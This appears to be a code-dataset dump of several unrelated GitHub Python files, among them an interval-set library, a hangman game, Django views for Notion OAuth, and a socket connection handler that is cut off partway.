__repr__(self):\n compact = lambda itv: str(tuple(itv)) if len(itv) > 1 else str(itv.inf)\n args = (compact(itv) for itv in self._itvs)\n return '{}({})'.format(type(self).__name__, ', '.join(args))\n\n def __iter__(self):\n \"\"\"Iterate over the processors in the ProcSet by increasing order.\"\"\"\n # as self._itvs is sorted by increasing order, we can directly yield\n for itv in self._itvs:\n yield from range(itv.inf, itv.sup + 1)\n\n def __reversed__(self):\n \"\"\"Iterate over the processors in the ProcSet by decreasing order.\"\"\"\n # as self._itvs is sorted in increasing order, we yield from the\n # reversed iterator\n for itv in reversed(self._itvs):\n yield from reversed(range(itv.inf, itv.sup + 1))\n\n def iter_slice(self, start=None, stop=None, step=None):\n \"\"\"\n Iterate over the processors in the ProcSet from *start* (included) to\n *stop* (excluded) by steps of *step*.\n \"\"\"\n cur, stop, step = slice(start, stop, step).indices(len(self))\n if step > 0:\n for itv in self._itvs:\n if stop <= cur: # early termination: no more matching items\n break\n while cur < len(itv) and cur < stop: # exhaust current itv\n yield itv.inf + cur\n cur += step\n # switch to new itv\n cur -= len(itv)\n stop -= len(itv)\n else:\n # work from end when step is negative\n cur -= len(self)\n stop -= len(self)\n for itv in reversed(self._itvs):\n if stop >= cur: # early termination: no more matching items\n break\n # account for current itv shift\n cur += len(itv)\n stop += len(itv)\n while cur >= 0 and cur > stop: # exhaust current itv\n yield itv.inf + cur\n cur += step # step is negative\n\n def __contains__(self, item):\n \"\"\"Check if item is in the ProcSet.\"\"\"\n if self._itvs:\n low, high = 0, len(self._itvs)\n while low < high:\n mid = (low + high) // 2\n if item in self._itvs[mid]:\n return True\n elif item < self._itvs[mid].inf:\n high = mid\n else:\n low = mid + 1\n return False\n\n def __eq__(self, other):\n # pylint: disable=protected-access\n return self._itvs == other._itvs\n\n def __bool__(self):\n return bool(self._itvs)\n\n def __len__(self):\n \"\"\"Return the number of processors contained in the ProcSet.\"\"\"\n return sum(len(itv) for itv in self._itvs)\n\n def count(self):\n \"\"\"Return the number of disjoint intervals in the ProcSet.\"\"\"\n return len(self._itvs)\n\n def iscontiguous(self):\n \"\"\"Return ``True`` if the ProcSet is made of a unique interval.\"\"\"\n return self.count() <= 1\n\n def isdisjoint(self, other):\n \"\"\"\n Return ``True`` if the ProcSet has no processor in common with *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n\n # A naive implementation would test the truthiness of the intersection\n # set. However, one does not care about the intersection set. It is\n # sufficient to test if the generator returned by _merge is empty.\n _sentinel = object()\n # pylint: disable=protected-access\n _first = next(self._merge(self._itvs, other._itvs, _operator.and_), _sentinel)\n return _first is _sentinel\n\n def _issubset(self, other):\n return self & other == self\n\n def issubset(self, other):\n \"\"\"Test whether every element in the ProcSet is in *other*.\"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n return self._issubset(other)\n\n def __le__(self, other):\n \"\"\"Test whether every element in the ProcSet is in *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n return self._issubset(other)\n\n def __lt__(self, other):\n \"\"\"\n Test whether the ProcSet is a proper subset of *other*, that is\n ``self <= other`` and ``self != other``.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n return self._issubset(other) and self != other\n\n def issuperset(self, other):\n \"\"\"Test whether every element in *other* is in the ProcSet.\"\"\"\n if not isinstance(other, type(self)):\n try:\n other = type(self)(*other)\n except TypeError:\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self)\n\n def __ge__(self, other):\n \"\"\"Test whether every element in *other* is in the ProcSet.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self)\n\n def __gt__(self, other):\n \"\"\"\n Test whether the ProcSet is a proper superset of *other*, that is\n ``self >= other`` and ``self != other``.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n # pylint: disable=protected-access\n return other._issubset(self) and self != other\n\n @staticmethod\n def _flatten(itvs):\n \"\"\"Generate the (flat) list of interval bounds contained in itvs.\"\"\"\n for itv in itvs:\n # use inf as is\n yield False, itv.inf\n # convert sup, as merging operations are made with half-open\n # intervals\n yield True, itv.sup + 1\n\n @classmethod\n def _merge_core(cls, left_itvs, right_itvs, keeppredicate):\n \"\"\"\n Generate the (flat) list of interval bounds of the requested merge.\n\n The implementation is inspired by https://stackoverflow.com/a/20062829.\n \"\"\"\n endbound = False\n sentinel = _Sentinel()\n\n # pylint: disable=protected-access\n lflat = cls._flatten(left_itvs)\n rflat = cls._flatten(right_itvs)\n lend, lhead = next(lflat, (False, sentinel))\n rend, rhead = next(rflat, (False, sentinel))\n\n head = min(lhead, rhead)\n while head < sentinel:\n inleft = (head < lhead) == lend\n inright = (head < rhead) == rend\n keep = keeppredicate(inleft, inright)\n\n if keep ^ endbound:\n endbound = not endbound\n yield head\n if head == lhead:\n lend, lhead = next(lflat, (False, sentinel))\n if head == rhead:\n rend, rhead = next(rflat, (False, sentinel))\n\n head = min(lhead, rhead)\n\n @classmethod\n def _merge(cls, left_itvs, right_itvs, keeppredicate):\n \"\"\"\n Generate the ProcInt list of the requested merge.\n\n The returned iterator is supposed to be assigned to the _itvs attribute\n of the result ProcSet.\n See the difference(), intersection(), symmetric_difference(), and\n union() methods for an usage example.\n \"\"\"\n flat_merge = cls._merge_core(left_itvs, right_itvs, keeppredicate)\n\n # Note that we are feeding the same iterable twice to zip.\n # The iterated bounds are hence grouped by pairs (lower and upper\n # bounds of the intervals).\n # As zip() stops on the shortest iterable, it won't consider the\n # optional terminating sentinel (the sentinel would be the last\n # element, and would have an odd index).\n for inf, sup in zip(flat_merge, flat_merge):\n yield ProcInt(inf, sup - 1) # convert back to closed intervals\n\n def union(self, *others):\n \"\"\"Return a new ProcSet with elements from the ProcSet and all others.\"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, _operator.or_))\n return result\n\n def __or__(self, other):\n \"\"\"Return a new ProcSet with elements from the ProcSet and *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.or_))\n return result\n\n def intersection(self, *others):\n \"\"\"\n Return a new ProcSet with elements common to the ProcSet and all\n others.\n \"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, _operator.and_))\n return result\n\n def __and__(self, other):\n \"\"\"\n Return a new ProcSet with elements common to the ProcSet and *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.and_))\n return result\n\n @staticmethod\n def _difference_operator(inleft, inright):\n return inleft and not inright\n\n def difference(self, *others):\n \"\"\"\n Return a new ProcSet with elements in the ProcSet that are not in the\n others.\n \"\"\"\n result = self.copy()\n for other in map(self._as_itvs, others):\n # pylint: disable=protected-access\n result._itvs = list(result._merge(result._itvs, other, self._difference_operator))\n return result\n\n def __sub__(self, other):\n \"\"\"\n Return a new ProcSet with elements in the ProcSet that are not in *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(\n self._merge(self._itvs, other._itvs, self._difference_operator)\n )\n return result\n\n def symmetric_difference(self, other):\n \"\"\"\n Return a new ProcSet with elements in either the ProcSet or *other*,\n but not in both.\n \"\"\"\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(result._merge(self._itvs, self._as_itvs(other), _operator.xor))\n return result\n\n def __xor__(self, other):\n \"\"\"\n Return a new ProcSet with elements in either the ProcSet or *other*,\n but not in both.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # We directly assign result._itvs as self._merge(…) returns a valid\n # _itvs list. This is the same as ProcSet(*self._merge(…)), minus the\n # input validation step.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = list(self._merge(self._itvs, other._itvs, _operator.xor))\n return result\n\n def copy(self):\n \"\"\"Return a new ProcSet with a shallow copy of the ProcSet.\"\"\"\n # We directly assign result._itvs as self._itvs is a valid list. Note\n # that a ProcSet is nothing more than a container with some extra\n # methods, and a given structure. As the current implementation relies\n # on the _itvs list, copying a ProcSet is the same as copying the _itvs\n # list. Hence, we need to ensure a new _itvs list is created (and not\n # just a reference to self._itvs). As _itvs is a list of ProcInt, a\n # shallow copy is the same as a deep copy.\n result = type(self)()\n # pylint: disable=protected-access\n result._itvs = self._itvs.copy()\n return result\n\n __copy__ = copy # ensure compatibility with standard module copy\n\n def __deepcopy__(self, memo):\n # Optimized version of __deepcopy__ for ProcSet.\n # /!\\ This optimization is implementation specific /!\\\n # The classic __deepcopy__ implementation can be bypassed because a\n # ProcInt is an immutable structure: there is no need to use the\n # generic and complex implementation of deepcopy for tuples that may\n # contain mutables.\n return self.copy()\n\n def update(self, *others):\n \"\"\"Update the ProcSet, adding elements from all others.\"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, _operator.or_))\n return self\n\n insert = update # backward compatibility alias\n\n def __ior__(self, other):\n \"\"\"Update the ProcSet, adding elements from *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.or_))\n return self\n\n def intersection_update(self, *others):\n \"\"\"\n Update the ProcSet, keeping only elements found in the ProcSet and all\n others.\n \"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, _operator.and_))\n return self\n\n def __iand__(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in the ProcSet and *other*.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.and_))\n return self\n\n def difference_update(self, *others):\n \"\"\"Update the ProcSet, removing elements found in others.\"\"\"\n for other in map(self._as_itvs, others):\n self._itvs = list(self._merge(self._itvs, other, self._difference_operator))\n return self\n\n discard = difference_update # convenience alias\n\n def __isub__(self, other):\n \"\"\"Update the ProcSet, removing elements found in *other*.\"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, self._difference_operator))\n return self\n\n def symmetric_difference_update(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in either the ProcSet\n or *other*, but not in both.\n \"\"\"\n self._itvs = list(self._merge(self._itvs, self._as_itvs(other), _operator.xor))\n return self\n\n def __ixor__(self, other):\n \"\"\"\n Update the ProcSet, keeping only elements found in either the ProcSet\n or *other*, but not in both.\n \"\"\"\n if not isinstance(other, type(self)):\n return NotImplemented\n\n # pylint: disable=protected-access\n self._itvs = list(self._merge(self._itvs, other._itvs, _operator.xor))\n return self\n\n def clear(self):\n \"\"\"Empty the ProcSet, removing all elements from it.\"\"\"\n self._itvs = []\n\n def __getitem_int(self, index):\n assert isinstance(index, int)\n cur = index\n if cur >= 0:\n for itv in self._itvs:\n if cur < len(itv):\n return itv.inf + cur\n cur -= len(itv)\n else:\n for itv in reversed(self._itvs):\n if cur >= -len(itv):\n return itv.sup + 1 + cur\n cur += len(itv)\n raise IndexError('{} index out of range'.format(type(self).__name__))\n\n def __getitem__(self, index):\n if isinstance(index, int):\n return self.__getitem_int(index)\n if isinstance(index, slice):\n return list(self.iter_slice(index.start, index.stop, index.step))\n raise TypeError(\n '{} indices must be integers or slices, not {}'.format(\n type(self).__name__,\n type(index).__name__\n )\n )\n\n __setitem__ = None # it makes no sense to 'modify' a processor\n\n def __delitem__(self, index):\n raise NotImplementedError\n\n def aggregate(self):\n \"\"\"\n Return a new ProcSet that is the convex hull of the ProcSet.\n\n The convex hull of an empty ProcSet is the empty ProcSet.\n\n The convex hull of a non-empty ProcSet is the contiguous ProcSet made\n of the smallest unique interval containing all intervals from the\n non-empty ProcSet.\n \"\"\"\n if self._itvs:\n return type(self)(ProcInt(self.min, self.max))\n return type(self)()\n\n def intervals(self):\n \"\"\"\n Return an iterator over the intervals of the ProcSet in increasing order.\n \"\"\"\n return iter(self._itvs)\n\n @property\n def min(self):\n \"\"\"The first processor in the ProcSet (in increasing order).\"\"\"\n try:\n return self._itvs[0].inf\n except IndexError:\n raise ValueError('Empty ProcSet') from None\n\n @property\n def max(self):\n \"\"\"The last processor in the ProcSet (in increasing order).\"\"\"\n try:\n return self._itvs[-1].sup\n except IndexError:\n raise ValueError('Empty ProcSet') from None\n\n @staticmethod\n def _as_procint(elem):\n \"\"\"Yield elem as a ProcInt.\"\"\"\n try: # ProcInt-compatible (iterable of exactly 2 int)\n inf, sup = elem\n except ValueError:\n raise TypeError(\n 'Incompatible iterable, expected an iterable of exactly 2 int'\n ) from None\n except TypeError: # single point (non-negative int)\n inf, sup = elem, elem\n\n yield ProcInt(inf, sup)\n\n @classmethod\n def _as_itvs(cls, other):\n \"\"\"Iterate over other as an _itvs list.\"\"\"\n if isinstance(other, cls):\n # pylint: disable=protected-access\n yield from other._itvs\n else:\n yield from cls._as_procint(other)\n","repo_name":"oar-team/procset.py","sub_path":"src/procset.py","file_name":"procset.py","file_ext":"py","file_size_in_byte":23527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34112691548","text":"from math import ceil, floor, sqrt\n\n\ndef get_counter(s):\n cnt = [0] * 10\n for ss in s:\n cnt[int(ss)] += 1\n return cnt\n\n\nN = int(input())\nS = input()\nmi, ma = int(\"\".join(sorted(list(S)))), int(\"\".join(sorted(list(S), reverse=True)))\ncounter = get_counter(S)\nans = 0\nfor i in range(floor(sqrt(mi)), ceil(sqrt(ma)) + 1):\n s = str(pow(i, 2)).rjust(N, \"0\")\n if counter == get_counter(s):\n ans += 1\nprint(ans)\n","repo_name":"kazu0716/programing_training","sub_path":"atcoder/ABC/324/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21477508683","text":"import random\nfrom hangman_words import word_list\nfrom hangman_art import stages, logo\nimport os\n\ndisplay = []\n\n# TODO-8\nlives = 6\n\n# TODO-1 - Randomly choose a word from the word_list and assign it to a variable called chosen_word.\n\n# TODO-2 - Ask the user to guess a letter and assign their answer to a variable called guess.\n# Make guess lowercase.\n\n# TODO-3 - Check if the letter the user guessed (guess) is one of the letters in the chosen_word.\n\n# TODO-4 - Create an empty List called display.\n# For each letter in the chosen_word, add a \"_\" to 'display'.\n# So if the chosen_word was \"apple\", display should be [\"_\", \"_\", \"_\", \"_\", \"_\"]\n# with 5 \"_\" representing each letter to guess\n\n# TODO-5 Loop through each position in the chosen_word;\n# If the letter at that position matches guess then\n# reveal that letter in the display at that position.\n# e.g If the user guessed \"p\" and the chosen word was\n# \"apple\", then display should be [\"_\", \"P\", \"P\", \"_\", \"_\"]\n\n# TODO-6: - Print 'display' and you should see the guessed letter in the correct position and every other letter replace with \"_\".\n# Hint - Don't worry about getting the user to guess the next letter. We'll tackle that in step 3.\n\n# TODO-7: - Use a while loop to let the user guess again.\n# The loop should only stop once the user has guessed all the letters in the chosen_word and 'display' has no more blanks (\"_\").\n# Then you can tell the user they've won.\n\n# TODO-8: - Create a variable called 'lives' to keep track of the number of lives left.\n# Set 'lives' to equal 6.\n\n# TODO-9: - If guess is not a letter in the chosen_word,\n# Then reduce 'lives' by 1.\n# If lives goes down to 0 then the game should stop and it should print \"You lose.\"\n\n# TODO-10: - print the ASCII art from 'stages' that corresponds\n# to the current number of 'lives' the user has remaining.\n\n# TODO-1\nchosen_word = random.choice(word_list).lower()\nword_length = len(chosen_word)\n\n\n# TODO-4\nfor _ in range(word_length):\n display.append(\"_\")\n\nprint(logo)\nprint(f\"the chosen word is: {chosen_word}\")\n\n\ndef guess_letter():\n global lives\n\n if not lives:\n # TODO-10\n print(stages[lives])\n print(\"You lose.\")\n lives -= 1\n return\n\n # TODO-2\n guess = input(\"Guess a letter from the word: \").lower()\n\n if guess.upper() in display:\n print(\"You already guessed this letter\")\n return\n\n # TODO-5\n for position in range(word_length):\n char = chosen_word[position]\n\n # TODO-3\n if guess == char:\n display[position] = char.upper()\n\n if guess not in chosen_word:\n # TODO-9\n print(\"That's not in the word. You lose a life.\")\n print(stages[lives])\n lives -= 1\n\n if \"_\" not in display:\n print(f\"{' '.join(display)}\")\n print(\"You win\")\n else:\n # TODO-6\n print(f\"{' '.join(display)}\")\n\n return lives\n\n\n# TODO-7\nwhile \"_\" in display and lives >= 0:\n guess_letter()\n","repo_name":"enriqueMota/day_seven_hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7810353127","text":"from django.urls import path\n\nfrom .views import ProductListView, ProductDetailView, ProductListCategoryView, ProductBySearchView, SearchView\n\nurlpatterns = [\n path('', ProductListView.as_view()),\n path('', ProductDetailView.as_view()),\n path('category/', ProductListCategoryView.as_view()),\n path('by/search', ProductBySearchView.as_view()),\n path('search/',SearchView.as_view() )\n\n]","repo_name":"yetian29/Ecommerce","sub_path":"apps/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39159284922","text":"\"\"\"\r\nAnd this first tutorial I'll show you 3\r\nways to solve the factorial problem\r\n\"\"\"\r\n\r\n\r\ndef fac(value):\r\n '''\r\n This uses simple recursion to \r\n solve it but theres a limit\r\n to how many times it can recur\r\n '''\r\n if value <= 1:\r\n return 1\r\n\r\n else:\r\n return value * fac(value - 1)\r\n\r\n\r\nprint('limits of facorial recursion Problem 1:')\r\nprint(fac(1))\r\nprint(fac(10))\r\nprint(fac(100))\r\n\r\n\r\ndef fac2(value, saved = None):\r\n '''\r\n Usually saving the data back into \r\n itself would be the solution, but \r\n since we only going back and looking \r\n at a value once this solution is only\r\n as fast as the first 1\r\n '''\r\n if saved is None:\r\n saved = dict()\r\n\r\n if value <= 1:\r\n return 1\r\n\r\n else:\r\n fact = value * (fac2(value-1, saved))\r\n saved[value] = fact\r\n return fact\r\n\r\nprint('\\n\\nlimits of more advance facorial recursion Problem 2:')\r\nprint(fac2(1))\r\nprint(fac2(10))\r\nprint(fac2(100))\r\n\r\ndef fac3(value):\r\n '''\r\n This doesn't use recursion\r\n while recursion is easy to \r\n use, it's not handy when\r\n going through a recursion call\r\n thousands of times. Your memormy\r\n in your pc or laptop wouldn't \r\n be able to handle it \r\n '''\r\n if value <= 0:\r\n return 1\r\n fact = 1\r\n for i in range(1, value +1):\r\n fact = fact * i\r\n\r\n return fact\r\nprint('\\n\\nlimits of dynimic solution to factorial Problem 3:')\r\nprint(fac3(1))\r\nprint(fac3(10))\r\nprint(fac3(100))\r\nprint(fac3(1000))\r\nprint(fac3(10000))","repo_name":"TylerEnglish/dynimic-project","sub_path":"Welcome/factorial_solutions.py","file_name":"factorial_solutions.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31634459172","text":"import numpy as np\nimport scipy\n\n\ndef estimate_rigid_transform(points_A, points_B):\n \"\"\"Estimate Transform.\n\n points_A : N x 3\n points_B : N x 3\n \"\"\"\n centroid_A = np.mean(points_A, axis=0)\n centroid_B = np.mean(points_B, axis=0)\n\n Am = points_A - centroid_A[None, :]\n Bm = points_B - centroid_B[None, :]\n R = estimate_rotation_transform(Am, Bm)\n t = -1 * np.matmul(R, centroid_A) + centroid_B\n RT = np.eye(4)\n RT[:3, :3] = R.T\n RT[:3, 3] = -1 * np.matmul(R.T, centroid_A) + centroid_B\n\n # pts = np.concatenate([points_A, points_A[:,2:]*0 + 1], axis=1)\n # temp = np.matmul(RT, pts.T) [0:3, :]\n # error1 = np.abs(np.matmul(Am, R) - Bm).sum()\n # error = np.abs(temp.T - points_B).sum()\n # breakpoint()\n return RT\n\n\ndef estimate_rotation_transform(points_A, points_B):\n \"\"\"Estimate rotation.\n\n Assumes the point sets are zero centered.\n\n points_A : N x 3\n points_B: N x 3\n \"\"\"\n R, sca = scipy.linalg.orthogonal_procrustes(\n points_A, points_B, check_finite=True)\n return R\n","repo_name":"google-research/google-research","sub_path":"human_object_interaction/oci/oci/utils/rigid_transform.py","file_name":"rigid_transform.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"2477694409","text":"import secrets\n\nfrom django.shortcuts import redirect, reverse\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\n\nimport requests\n\nfrom oauthlib.oauth2 import WebApplicationClient\n\nfrom .models import NotionAuthorization\n\nserver_url = \"http://localhost:8000\" # The URL of this server\nredirect_uri = f\"{server_url}/notion/redirect\"\n\nauthorization_base_url = 'https://api.notion.com/v1/oauth/authorize'\n\ntoken_url = 'https://api.notion.com/v1/oauth/token'\n\nSTATE_SESSION_KEY = \"notion_state\"\n\n@login_required\ndef notion_auth_start(request):\n client = WebApplicationClient(settings.NOTION_CLIENT_ID)\n\n state = generate_state()\n request.session[STATE_SESSION_KEY] = state\n\n authorize_request_url = client.prepare_request_uri(\n authorization_base_url, redirect_uri)\n return redirect(authorize_request_url)\n\n@login_required\ndef notion_redirect(request):\n\t# oauthlib needs the complete uri with host name \n url = request.get_full_path()\n\t\t\n client = WebApplicationClient(settings.NOTION_CLIENT_ID)\n state = request.session.pop(STATE_SESSION_KEY)\n client.parse_request_uri_response(url, state=state)\n \n\t# Creates the URL, headers, and request body for the token request\n token_request_params = client.prepare_token_request(token_url, url, redirect_uri)\n\n\t# Makes a request for the token, authenticated with the client ID and secret\n auth = requests.auth.HTTPBasicAuth(\n settings.NOTION_CLIENT_ID, settings.NOTION_CLIENT_SECRET)\n response = requests.post(\n token_request_params[0], headers=token_request_params[1], data=token_request_params[2], auth=auth)\n\n if response.ok:\n token_response = client.parse_request_body_response(response.text)\n\n authorization = NotionAuthorization.objects.create(\n user = request.user,\n access_token = token_response.get(\"access_token\"),\n bot_id = token_response.get(\"bot_id\"),\n duplicated_template_id = token_response.get(\"duplicated_template_id\", None),\n workspace_name = token_response.get(\"workspace_name\"),\n workspace_icon = token_response.get(\"workspace_icon\"),\n workspace_id = token_response.get(\"workspace_id\"),\n owner = token_response.get(\"owner\")\n )\n authorization.save()\n\n return HttpResponseRedirect(reverse('notion_demo:home'))\n\ndef generate_state():\n return secrets.token_urlsafe(8)","repo_name":"lgaud/oauth_tutorial","sub_path":"notion_oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11683670675","text":"import logging\nimport queue\nimport struct\nimport selectors\nimport traceback\nfrom socket import socket\nfrom threading import Event, Thread\n\nfrom src.NetProtocol.AwaitResponse import MessageEvent\nfrom src.NetProtocol.Request import Request\nfrom src.Utility.NetworkUtilities import json_decode\nfrom src.NetProtocol.Message import Message\n\n\n# Required headers in the JSON header\nREQUIRED_HEADERS = [\n \"byteorder\",\n \"content_length\",\n \"content_type\",\n \"content_encoding\",\n \"CSeq\"\n]\n\n\n# Handles setting up connections and monitoring all socket connections\nclass ConnectionMonitor(Thread):\n def __init__(self, termination_event: Event, selector, receive_queue):\n super().__init__()\n self.termination_event = termination_event\n self.selector = selector\n self.receive_queue = receive_queue\n self.connection_number = 1\n\n def run(self):\n try:\n while not self.termination_event.is_set():\n # logging.debug(f\"Checking selector.select\")\n events = self.selector.select(timeout=None)\n for key, mask in events:\n if key.data is None:\n # A new connection\n self._accept_wrapper(key.fileobj)\n else:\n conn_handler = key.data\n try:\n conn_handler.process_events(mask)\n except Exception:\n logging.error(f\"Exception in message from/to {conn_handler.addr}\\n:{traceback.format_exc()}\")\n conn_handler.close()\n # Check for a socket still being monitored\n if not self.selector.get_map():\n break\n except KeyboardInterrupt:\n logging.info(\"Caught keyboard interrupt, exiting.\")\n finally:\n logging.debug(f\"Connection handler stopped.\")\n self.selector.close()\n self.termination_event.set()\n\n # Handle a new connection\n def _accept_wrapper(self, sock: socket):\n conn, addr = sock.accept()\n logging.info(f\"Accepted connection from {conn.getpeername()}\")\n conn.setblocking(False)\n conn_handler = ConnectionHandler(selector=self.selector, sock=conn, addr=conn.getpeername(),\n num=self.connection_number, receive_queue=self.receive_queue)\n self.connection_number += 1\n self.selector.register(conn, selectors.EVENT_READ | selectors.EVENT_WRITE, data=conn_handler)\n\n\n# Handles receiving and sending on a specific connection. Run on main server/client thread\n# based on https://realpython.com/python-sockets/#application-client-and-server\nclass ConnectionHandler(Thread):\n def __init__(self, selector: selectors.BaseSelector, sock: socket, addr, num, receive_queue: queue.Queue):\n super().__init__(name=\"ConnectionHandler\")\n self.selector = selector\n self.sock = sock\n self.addr = addr\n self.peer_name = f\"peer_{num}\"\n self.CSeq = -1 # Sequence number we use when sending messages, incremented each message\n self.peer = None # Is set to a NetworkNode after a successful handshake\n self._recv_buffer = b\"\"\n self._send_buffer = b\"\"\n self._current_recv_message = None\n # submit messages to the global receive queue\n self._receive_queue = receive_queue\n # each message handler gets own send queue\n self._send_queue = queue.Queue()\n # CSeq -> Event dict, events are set when the CSeq we are awaiting arrives\n self.await_list = dict()\n\n def process_events(self, mask):\n if mask & selectors.EVENT_READ:\n self._read_wrapper()\n if mask & selectors.EVENT_WRITE:\n self._write_wrapper()\n\n def _read_wrapper(self):\n self._read()\n\n if self._current_recv_message is None:\n #logging.debug(f\"started receiving new message\")\n self._current_recv_message = Message(handler=self)\n\n # could take multiple _read to process single message, so keep track of headers\n if self._current_recv_message.json_header_len is None:\n self._process_protoheader()\n\n if self._current_recv_message.json_header_len is not None:\n if self._current_recv_message.json_header is None:\n self._process_jsonheader()\n\n if self._current_recv_message.json_header:\n if self._current_recv_message.content is None:\n self._process_message()\n\n # read from socket to a buffer\n def _read(self):\n try:\n # Should be ready to read\n data = self.sock.recv(4096)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n # Empty message interpreted as socket closed\n logging.info(f\"Peer at {self.addr} closed.\")\n self.close()\n\n def _write_wrapper(self):\n if not self._send_buffer:\n if not self._send_queue.empty():\n self._send_buffer += self._send_queue.get()\n #else:\n # logging.info(\"Nothing more to write\")\n # self._set_selector_events_mask('r')\n\n self._write()\n\n # Send data in the send buffer\n def _write(self):\n if self._send_buffer:\n # logging.debug(f\"Sending {self._send_buffer!r} to {self.addr}\")\n try:\n # Should be ready to write\n sent = self.sock.send(self._send_buffer)\n\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n self._send_buffer = self._send_buffer[sent:]\n if sent and not self._send_buffer:\n # buffer is drained. The response has been sent.\n logging.debug(f\"Message has been sent\")\n\n\n # Process the fixed length header (2 byte, big endian), gives length of following JSON header\n def _process_protoheader(self):\n hdrlen = 2\n if len(self._recv_buffer) >= hdrlen:\n self._current_recv_message.json_header_len = struct.unpack(\">H\", self._recv_buffer[:hdrlen])[0]\n self._recv_buffer = self._recv_buffer[hdrlen:]\n\n # Process variable length json_header\n def _process_jsonheader(self):\n hdrlen = self._current_recv_message.json_header_len\n if len(self._recv_buffer) >= hdrlen:\n self._current_recv_message.json_header = json_decode(self._recv_buffer[:hdrlen], \"utf-8\")\n self._recv_buffer = self._recv_buffer[hdrlen:]\n for req_hdr in REQUIRED_HEADERS:\n if req_hdr not in self._current_recv_message.json_header:\n raise ValueError(f\"Missing required header '{req_hdr}'.\")\n # Make sure CSeq is correct on the message\n self._current_recv_message.CSeq = self._current_recv_message.json_header['CSeq']\n\n # Process message after reading the header\n def _process_message(self):\n hdr = self._current_recv_message.json_header\n content_len = hdr[\"content_length\"]\n # don't process now if we haven't received the whole message yet\n if not len(self._recv_buffer) >= content_len:\n return\n # get received content\n data = self._recv_buffer[:content_len]\n self._recv_buffer = self._recv_buffer[content_len:]\n\n if hdr[\"content_type\"] == \"text/json\":\n encoding = hdr[\"content_encoding\"]\n self._current_recv_message.content = Request(content=json_decode(data, encoding))\n logging.debug(f\"Received request {self._current_recv_message.content.request['action']} from {self.addr}\")\n else:\n # Binary or unknown content-type\n self._current_recv_message.content = data\n logging.debug(\n f\"Received {hdr['content_type']} \"\n f\"request from {self.addr}\"\n )\n self._receive_queue.put(self._current_recv_message)\n self._current_recv_message = None\n\n # enqueue a request, return CSeq\n def send_message(self, message: Message, is_response=False):\n message.conn_handler = self\n message.is_received = False\n # Don't change the CSeq if we are responding to a message\n if not is_response:\n self.CSeq += 1\n logging.debug(f\"CSeq for {self.addr} is now {self.CSeq}\")\n message.CSeq = self.CSeq\n logging.debug(f\"Enqueued{' response' if is_response else ''}: {message.content.request['action']} to {self.addr} with CSeq {message.CSeq}\")\n #self._set_selector_events_mask('rw')\n 